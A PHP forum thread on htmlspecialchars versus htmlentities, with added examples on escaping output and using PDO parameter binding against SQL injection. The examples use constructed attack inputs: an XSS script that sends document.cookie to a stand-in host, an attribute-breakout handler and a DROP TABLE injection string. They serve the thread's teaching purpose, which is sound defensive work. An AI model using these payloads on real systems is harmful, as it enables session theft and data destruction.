Why and when to use htmlentities and htmlspecialchars

Dear experts,

I know what htmlentities and htmlspecialchars do, as in converting <, >, &, etc. into &lt;, &gt; etc.

I wish to know when to use these functions, and shall I store converted values such as &lt;, &gt; etc. in the database?

Kinderly Wade (programmer) asked:

Göran Andersson commented:
You should HTML encode basically any text that you put in the HTML code, like text content in an element and values for attributes. Example:

<div class="<?php echo htmlspecialchars($divClass) ?>"><?php echo htmlspecialchars($divContent)?></div>


This applies of course to strings that you don't have full control over yourself. If you know that the string certainly can't contain anything that needs to be encoded, you naturally don't have to encode it.

Normally you would not store the text HTML encoded in the database, but rather encode it when you have fetched it from the database and want to display it in the page. HTML encoded text takes up more space in the database, and by HTML encoding it you would designate the data for being displayed in HTML. If you for example want to do a text search in the data, that becomes difficult or inefficient if it has HTML entities in it.
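As an added example (not code from the thread's participants): the helper `h()`, the sample `$divClass` and `$divContent` values and the single-quoted attribute are assumptions chosen to show what the answer above describes. It renders the same `<div>` once with raw interpolation and once through `htmlspecialchars`, and shows the difference between `htmlspecialchars` and `htmlentities`. Note that on PHP before 8.1 the default flags (`ENT_COMPAT | ENT_HTML401`) leave single quotes alone, so a value inside a single-quoted attribute can still break out; passing `ENT_QUOTES` explicitly closes that gap on every version.

```php
<?php
declare(strict_types=1);

// Added example, not part of the original thread. The helper name h()
// and the sample inputs below are assumptions for illustration.

/**
 * Escape a string for use as HTML text content or inside a quoted
 * attribute value. ENT_QUOTES escapes both ' and " so the result is safe
 * in single- and double-quoted attributes; ENT_SUBSTITUTE replaces
 * invalid UTF-8 sequences instead of returning an empty string.
 */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Constructed inputs: one that tries to break out of an attribute,
// one that tries to inject markup and script into element content.
$divClass   = "user-card' onmouseover='alert(1)";
$divContent = 'Tom & Jerry <script>alert("xss")</script> café';

// Raw interpolation: the quote in $divClass closes the attribute and adds an
// event handler, and the <script> in $divContent is executed.  Never do this.
$unsafe = "<div class='$divClass'>$divContent</div>\n";

// Escaped: quotes, <, > and & become entities, so the browser shows them as
// text inside the attribute and the element instead of parsing them as markup.
$safe = "<div class='" . h($divClass) . "'>" . h($divContent) . "</div>\n";

echo $unsafe, $safe;

// htmlspecialchars touches only & < > " and ' (the last one only with
// ENT_QUOTES).  htmlentities additionally converts every character that has
// a named entity, such as the é above.  On a UTF-8 page the first is all you
// need, and it keeps the text readable and searchable.
echo htmlspecialchars('café <b>', ENT_QUOTES, 'UTF-8'), "\n";
echo htmlentities('café <b>', ENT_QUOTES, 'UTF-8'), "\n";
```

Run it with `php example.php` and compare the two `<div>` lines: the first one is live markup, the second is inert text. Encoding is done at the point where the value enters the HTML, which is why the same raw string can later be written to a JSON response or a log without double-encoding.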
Ray Paseur commented:
Do not store the converted values in the database.  Store the originals.

Use these functions whenever your script creates output from user input.  Typically this would be in the View component of the MVC design pattern.  The idea is to make stray and unwanted HTML and JavaScript into something that is safe for the client browsers.  If you do not do this, the client browser will run JavaScript when you send the JavaScript, and that may include doing some rather nasty things to the clients.
Kinderly Wade (programmer, author) commented:
Hi experts,

If I don't store the converted value in the database, what can I do to prevent a SQL injection? I am trying to convert characters in a way that can be safely stored in the database with SQL injection prevention. Thanks.
Ray Paseur commented:
I think you're confusing SQL injection with the output-related issues associated with sending evil JavaScript to the browser.  SQL injection may occur when your script uses unfiltered external data in a query string.  But rather than have me repeat it all, here is a link to an authoritative source -- required reading if you are going to create a web site that faces the public!

See also: http://php.net/manual/en/security.php
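The point made in the two answers above, as an added example that is not part of the original thread: the two problems are solved at two different places. SQL injection is handled when the query is built, by binding parameters, and the raw text is stored as typed; cross-site scripting is handled in the view, by escaping at output. The code uses PDO with an in-memory SQLite database so it runs without a server (it assumes the `pdo_sqlite` extension is loaded); the `comments` table, its columns and the two hostile input strings are constructed for illustration.

```php
<?php
declare(strict_types=1);

// Added example, not from the original thread.  Uses an in-memory SQLite
// database via PDO so it runs without a server; table and column names are
// assumptions for illustration.

$db = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // let the driver prepare natively
]);
$db->exec('CREATE TABLE comments (id INTEGER PRIMARY KEY, author TEXT NOT NULL, body TEXT NOT NULL)');

// Constructed "user input": one value aimed at the SQL layer, one at the browser.
$author = "Robert'); DROP TABLE comments; --";
$body   = '<script>document.location="http://evil.example/?c="+document.cookie</script>';

// SQL injection is prevented by parameter binding, not by htmlspecialchars.
// The values travel separately from the query text, so the quote and the
// semicolon in $author are data, and both strings are stored exactly as typed.
$insert = $db->prepare('INSERT INTO comments (author, body) VALUES (:author, :body)');
$insert->execute([':author' => $author, ':body' => $body]);

// The same pattern applies to any query driven by user input.
$byAuthor = $db->prepare('SELECT id, author, body FROM comments WHERE author = :author');
$byAuthor->execute([':author' => $author]);
$rows = $byAuthor->fetchAll(PDO::FETCH_ASSOC);

// The table still exists and the row holds the original, unencoded strings.
if (count($rows) !== 1 || $rows[0]['author'] !== $author || $rows[0]['body'] !== $body) {
    throw new RuntimeException('stored data does not match the raw input');
}

/** Escape for HTML text content or a quoted attribute value. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// XSS is prevented at output time, in the view.  Each value is escaped once,
// here, as it goes into the HTML; the <script> in $body is rendered as text.
foreach ($rows as $row) {
    echo '<article data-id="', h((string) $row['id']), '">',
         '<h3>', h($row['author']), '</h3>',
         '<p>', h($row['body']), '</p>',
         '</article>', "\n";
}
```

Because the database holds the raw text, a full-text search for `Robert` or a later export to JSON works unchanged, and the escaping rules can differ per output context (HTML here, JSON or a mail header elsewhere) without touching the stored data.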

Question has a verified solution.